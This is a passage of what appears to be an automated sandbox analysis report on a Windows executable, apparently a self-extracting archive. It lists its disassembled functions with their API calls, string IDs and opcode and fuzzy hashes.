                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e81397f0895e770e82fca3693c8628e06fb77294065a21af849c63e24b7984bc
                  • Instruction ID: 573453bf10fff153a5dbe022f6d69a099158c22a3ca96fff0cbd237bc63e01ca
                  • Opcode Fuzzy Hash: e81397f0895e770e82fca3693c8628e06fb77294065a21af849c63e24b7984bc
                  • Instruction Fuzzy Hash: B551D1315083D94FC712CF24918457EBFE1BEDA314F49489EE5E54B226D220E789CBA2
                  Function 009FF968 Relevance: .1, Instructions: 131COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 884b4ed02497d91f277cad1678683e9db01e40780299186cb893c65d71da79f0
                  • Instruction ID: 884310b1564dac0206cc278b126932f6dd41ce0ee8b1683de3139bd5a0de776c
                  • Opcode Fuzzy Hash: 884b4ed02497d91f277cad1678683e9db01e40780299186cb893c65d71da79f0
                  • Instruction Fuzzy Hash: 73512571A083068FC748CF19D49059AF7E1FF88354F058A2EE899E7740DB34EA59CB96
                  Function 00A037C1 Relevance: .1, Instructions: 112COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                  • Instruction ID: c84099b60d10897ed2b9121080c5e4fee2ec6090e42ae4655ff82493e74efa8d
                  • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                  • Instruction Fuzzy Hash: A131E5F2A1474A8FCB14EF28D85166EBBE0FB95300F10492DE599C7382C735EA59CB91
                  Function 009F5F3C Relevance: .1, Instructions: 76COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 514545809fab076cae38363d0afc0be31cbfe140a6872818a4c271d3ce5276d4
                  • Instruction ID: b0ab83a2a8af26ad1db8f270879a4a711097a6b935e840ce58e4010eba5b4814
                  • Opcode Fuzzy Hash: 514545809fab076cae38363d0afc0be31cbfe140a6872818a4c271d3ce5276d4
                  • Instruction Fuzzy Hash: 6321DA32A201654FCB58CF6EEC908767766B786311747817BFB468B2D1C534E926C7A0
                  Function 009FDA98 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 236COMMON
                  Download Yara Rule
                  APIs
                  • _swprintf.LIBCMT ref: 009FDABE
                    • Part of subcall function 009F400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009F401D
                    • Part of subcall function 00A01596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00A30EE8,00000200,009FD202,00000000,?,00000050,00A30EE8), ref: 00A015B3
                  • _strlen.LIBCMT ref: 009FDADF
                  • SetDlgItemTextW.USER32(?,00A2E154,?), ref: 009FDB3F
                  • GetWindowRect.USER32(?,?), ref: 009FDB79
                  • GetClientRect.USER32(?,?), ref: 009FDB85
                  • GetWindowLongW.USER32(?,000000F0), ref: 009FDC25
                  • GetWindowRect.USER32(?,?), ref: 009FDC52
                  • SetWindowTextW.USER32(?,?), ref: 009FDC95
                  • GetSystemMetrics.USER32(00000008), ref: 009FDC9D
                  • GetWindow.USER32(?,00000005), ref: 009FDCA8
                  • GetWindowRect.USER32(00000000,?), ref: 009FDCD5
                  • GetWindow.USER32(00000000,00000002), ref: 009FDD47
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                  • String ID: $%s:$CAPTION$d
                  • API String ID: 2407758923-2512411981
                  • Opcode ID: ffd1779b4328c3dd4a879d77117bf6050a4bd1ad64f50d4b03efe30ef54e3685
                  • Instruction ID: cb592d7a86cc5c9d2a1f453eeb465b3b0727cac7291b8aca90cad13a13aace3b
                  • Opcode Fuzzy Hash: ffd1779b4328c3dd4a879d77117bf6050a4bd1ad64f50d4b03efe30ef54e3685
                  • Instruction Fuzzy Hash: E6819072209305AFD710DFA8CD85B6BBBE9FBC9705F04092DFA8493290D671E906CB52
                  Function 00A1C233 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • ___free_lconv_mon.LIBCMT ref: 00A1C277
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BE2F
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BE41
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BE53
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BE65
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BE77
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BE89
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BE9B
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BEAD
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BEBF
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BED1
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BEE3
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BEF5
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BF07
                  • _free.LIBCMT ref: 00A1C26C
                    • Part of subcall function 00A184DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A1BFA7,?,00000000,?,00000000,?,00A1BFCE,?,00000007,?,?,00A1C3CB,?), ref: 00A184F4
                    • Part of subcall function 00A184DE: GetLastError.KERNEL32(?,?,00A1BFA7,?,00000000,?,00000000,?,00A1BFCE,?,00000007,?,?,00A1C3CB,?,?), ref: 00A18506
                  • _free.LIBCMT ref: 00A1C28E
                  • _free.LIBCMT ref: 00A1C2A3
                  • _free.LIBCMT ref: 00A1C2AE
                  • _free.LIBCMT ref: 00A1C2D0
                  • _free.LIBCMT ref: 00A1C2E3
                  • _free.LIBCMT ref: 00A1C2F1
                  • _free.LIBCMT ref: 00A1C2FC
                  • _free.LIBCMT ref: 00A1C334
                  • _free.LIBCMT ref: 00A1C33B
                  • _free.LIBCMT ref: 00A1C358
                  • _free.LIBCMT ref: 00A1C370
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                  • String ID:
                  • API String ID: 161543041-0
                  • Opcode ID: 72639a1b0f792181e2df7373eadee5309af3889ecde154a4fbaa6d6c6f7106b2
                  • Instruction ID: 6fa0392d857c9f5582fd664d3fdb379c1e8061ba847879fe655a8bc0430463e4
                  • Opcode Fuzzy Hash: 72639a1b0f792181e2df7373eadee5309af3889ecde154a4fbaa6d6c6f7106b2
                  • Instruction Fuzzy Hash: A1315A326402059FEB30AB78DA45BDAB3E9BF10320F148529E459DB951DF39ECC0DA60
                  Function 00A0CD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetWindow.USER32(?,00000005), ref: 00A0CD51
                  • GetClassNameW.USER32(00000000,?,00000800), ref: 00A0CD7D
                    • Part of subcall function 00A017AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,009FBB05,00000000,.exe,?,?,00000800,?,?,00A085DF,?), ref: 00A017C2
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00A0CD99
                  • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00A0CDB0
                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00A0CDC4
                  • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00A0CDED
                  • DeleteObject.GDI32(00000000), ref: 00A0CDF4
                  • GetWindow.USER32(00000000,00000002), ref: 00A0CDFD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                  • String ID: STATIC
                  • API String ID: 3820355801-1882779555
                  • Opcode ID: b1fafb5b2bd5e59de3be57e5ea5e115143f6b8027ba10fdc6694502a2f03afde
                  • Instruction ID: 23ecaf9ab27818993cb9570819165567c383b6aa531eb818f74696195bc9d55a
                  • Opcode Fuzzy Hash: b1fafb5b2bd5e59de3be57e5ea5e115143f6b8027ba10fdc6694502a2f03afde
                  • Instruction Fuzzy Hash: 2E11E7325417187BE631ABB0FC09F9F3A5CBB56762F004620FA46A60D2CA648D1797A5
                  Function 00A18EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 00A18EC5
                    • Part of subcall function 00A184DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A1BFA7,?,00000000,?,00000000,?,00A1BFCE,?,00000007,?,?,00A1C3CB,?), ref: 00A184F4
                    • Part of subcall function 00A184DE: GetLastError.KERNEL32(?,?,00A1BFA7,?,00000000,?,00000000,?,00A1BFCE,?,00000007,?,?,00A1C3CB,?,?), ref: 00A18506
                  • _free.LIBCMT ref: 00A18ED1
                  • _free.LIBCMT ref: 00A18EDC
                  • _free.LIBCMT ref: 00A18EE7
                  • _free.LIBCMT ref: 00A18EF2
                  • _free.LIBCMT ref: 00A18EFD
                  • _free.LIBCMT ref: 00A18F08
                  • _free.LIBCMT ref: 00A18F13
                  • _free.LIBCMT ref: 00A18F1E
                  • _free.LIBCMT ref: 00A18F2C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 01d85a1bf328acbfde29a9d5994fd2530667ef0a049443242f6c87b2a5cf65b6
                  • Instruction ID: 55b9a126498751c0048f4bd9bdc7c723de49772aa63abc7e0412f4073f083c4a
                  • Opcode Fuzzy Hash: 01d85a1bf328acbfde29a9d5994fd2530667ef0a049443242f6c87b2a5cf65b6
                  • Instruction Fuzzy Hash: 9211B67650010DBFCB21EF54DA42CDA3BA5FF14350B5142A5FA088F66ADE35EE91DB80
                  Function 009F2162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID:
                  • String ID: ;%u$x%u$xc%u
                  • API String ID: 0-2277559157
                  • Opcode ID: 0f1218eaca907d224061569a4f2b41e45acc147d136c0ea976003a13bf98a81f
                  • Instruction ID: ab7c353aa44f3157055d140ec954dada096a96d1ab3164b0943f2abaefa26aea
                  • Opcode Fuzzy Hash: 0f1218eaca907d224061569a4f2b41e45acc147d136c0ea976003a13bf98a81f
                  • Instruction Fuzzy Hash: 66F128B160834D5BDB15EF388995BFE77996FD0300F084479FB85CB283DA64A848C7A2
                  Function 00A0ACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009F130B: GetDlgItem.USER32(00000000,00003021), ref: 009F134F
                    • Part of subcall function 009F130B: SetWindowTextW.USER32(00000000,00A235B4), ref: 009F1365
                  • EndDialog.USER32(?,00000001), ref: 00A0AD20
                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 00A0AD47
                  • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00A0AD60
                  • SetWindowTextW.USER32(?,?), ref: 00A0AD71
                  • GetDlgItem.USER32(?,00000065), ref: 00A0AD7A
                  • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00A0AD8E
                  • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00A0ADA4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: MessageSend$Item$TextWindow$Dialog
                  • String ID: LICENSEDLG
                  • API String ID: 3214253823-2177901306
                  • Opcode ID: 5d57715911e7d28cd43617363bd1ef9a20c78ef9324accf9a2a96a12592eeba9
                  • Instruction ID: b458036e1c0e3edfddfe3fadd23e5968c3eac57f7144663eef72c65b22e9a931
                  • Opcode Fuzzy Hash: 5d57715911e7d28cd43617363bd1ef9a20c78ef9324accf9a2a96a12592eeba9
                  • Instruction Fuzzy Hash: 56219E32240308BBD221DBA1BD49F7B3B6DFB57B57F010014F605A28E0DA629D02D772
                  Function 009F9443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 009F9448
                  • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 009F946B
                  • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 009F948A
                    • Part of subcall function 00A017AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,009FBB05,00000000,.exe,?,?,00000800,?,?,00A085DF,?), ref: 00A017C2
                  • _swprintf.LIBCMT ref: 009F9526
                    • Part of subcall function 009F400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009F401D
                  • MoveFileW.KERNEL32(?,?), ref: 009F9595
                  • MoveFileW.KERNEL32(?,?), ref: 009F95D5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                  • String ID: rtmp%d
                  • API String ID: 2111052971-3303766350
                  • Opcode ID: 388b05291327cfa6803937ef6b587c95538e6b3dd50f847b7e652ad74afa17ad
                  • Instruction ID: 1707a6114520becaa2482b4789e5e71032aee73de8dae698d88252d0633bb75c
                  • Opcode Fuzzy Hash: 388b05291327cfa6803937ef6b587c95538e6b3dd50f847b7e652ad74afa17ad
                  • Instruction Fuzzy Hash: 71413C7290025CA6CF20EBA48C85BFA737CAF95384F0444E5B649E3056EB748B89CB64
                  Function 00A00A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON
                  Download Yara Rule
                  APIs
                  • __aulldiv.LIBCMT ref: 00A00A9D
                    • Part of subcall function 009FACF5: GetVersionExW.KERNEL32(?), ref: 009FAD1A
                  • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00A00AC0
                  • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00A00AD2
                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00A00AE3
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A00AF3
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A00B03
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A00B3D
                  • __aullrem.LIBCMT ref: 00A00BCB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                  • String ID:
                  • API String ID: 1247370737-0
                  • Opcode ID: 4fc2139b3138afcf4dd169e31b7a338e20f792cd1a4ef9e069d8d6565570c00d
                  • Instruction ID: 5167178ebabb75a6eb468c89892169cf214608c82fa356166239bd66e33b7be9
                  • Opcode Fuzzy Hash: 4fc2139b3138afcf4dd169e31b7a338e20f792cd1a4ef9e069d8d6565570c00d
                  • Instruction Fuzzy Hash: 9B4129B24083099FC710DFA5D880A6BF7F8FB89714F004A2EF5D692650E778E549CB61
                  Function 00A1EE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                  Download Yara Rule
                  APIs
                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00A1F5A2,?,00000000,?,00000000,00000000), ref: 00A1EE6F
                  • __fassign.LIBCMT ref: 00A1EEEA
                  • __fassign.LIBCMT ref: 00A1EF05
                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00A1EF2B
                  • WriteFile.KERNEL32(?,?,00000000,00A1F5A2,00000000,?,?,?,?,?,?,?,?,?,00A1F5A2,?), ref: 00A1EF4A
                  • WriteFile.KERNEL32(?,?,00000001,00A1F5A2,00000000,?,?,?,?,?,?,?,?,?,00A1F5A2,?), ref: 00A1EF83
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                  • String ID:
                  • API String ID: 1324828854-0
                  • Opcode ID: d1a7c2cadecbf5238cc738e0158d3031cb785cb55408b5087620afe9d7e13c5f
                  • Instruction ID: 8fc545a152670cb51fb63c0c13c3618f0cb8fd9bbf2f988136927c87da77d694
                  • Opcode Fuzzy Hash: d1a7c2cadecbf5238cc738e0158d3031cb785cb55408b5087620afe9d7e13c5f
                  • Instruction Fuzzy Hash: 095185B1A00249AFDB10CFA8D845EEEBBF5FF09310F14452AED55E7291E7709982CB60
                  Function 00A0C534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                  Download Yara Rule
                  APIs
                  • GetTempPathW.KERNEL32(00000800,?), ref: 00A0C54A
                  • _swprintf.LIBCMT ref: 00A0C57E
                    • Part of subcall function 009F400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009F401D
                  • SetDlgItemTextW.USER32(?,00000066,00A3946A), ref: 00A0C59E
                  • _wcschr.LIBVCRUNTIME ref: 00A0C5D1
                  • EndDialog.USER32(?,00000001), ref: 00A0C6B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                  • String ID: %s%s%u
                  • API String ID: 2892007947-1360425832
                  • Opcode ID: 7b6aeeb559c2cae6b1aae06a6c8db7aab790fca29a410cd1c01184f87cfc26e6
                  • Instruction ID: d034f3731e62fe9f34d8d7b2fab7ea3e4d7665b2f89d5d75be21fb865af0a69a
                  • Opcode Fuzzy Hash: 7b6aeeb559c2cae6b1aae06a6c8db7aab790fca29a410cd1c01184f87cfc26e6
